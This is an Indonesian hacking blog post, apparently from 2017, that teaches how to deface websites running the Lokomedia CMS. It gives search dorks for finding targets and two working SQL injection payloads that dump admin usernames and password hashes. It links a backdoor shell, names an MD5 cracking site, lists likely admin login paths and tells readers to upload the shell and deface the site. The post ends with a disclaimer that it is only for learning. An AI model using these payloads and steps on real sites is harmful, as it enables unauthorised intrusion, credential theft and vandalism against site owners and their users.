Deface SQL Lokomedia Full
Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface SQL Lokomedia Full
Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini
Baiklah kembali lagi dengan saya Adewa. Kali ini saya akan memberikan tutorial Deface SQL Lokomedia FullSiapkan dulu alat alat dan bahan
Bahan Bahan
1. Dork = inurl:statis--profil.html
inurl:statis--profil.html
inurl:statis--strukturorganisasi.html
(Kembangin dorknya biar makin JOS)
2. Exploit
2. Exploit
Exploit 1.= 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Exploit 2 = 'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---
3. Shell Backdoor = https://pastebin.com/nC6pWh5a (Punya indoXploit)
4. Script Deface = Di Sini
Step By Step
1. Dorking dulu dork di atas
2. Jika sudah masukin exploit di atas (Pilih salah satu aja). Jika Vuln akan ada <LI> atau apalah di title web
(Seperti Ini)
3. Tekan CTRL+U di keyboard. Akan ada username dan passwordnya
Catatan= password masih berbentuk md5
4. Crack Passwordnya Di Sini atau di sini https://hashkiller.co.uk/md5-decrypter.aspx
Crack Seperti Ini
5. Tinggal cari aja login adminnya
site/admin
site/administrator
site/redaktur
site/adminweb
site/admin.php
(Use Your Brain)
6. Upload Shell
Croott deh sepuas kalian
Sekianlah Postingan Dari All Tutor Cyber tentang "Deface SQL Lokomedia Full " Semoga Bisa Bermanfaat!.
Anda Sekarang Sedang Membaca Postingan "Deface SQL Lokomedia Full " Dengan URL https://ryangueltoem.blogspot.co.id/2017/11/deface-sql-lokomedia-full.html
Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.
Sekian. Terimakasih
All Tutor Cyber
0 Blogger Comments
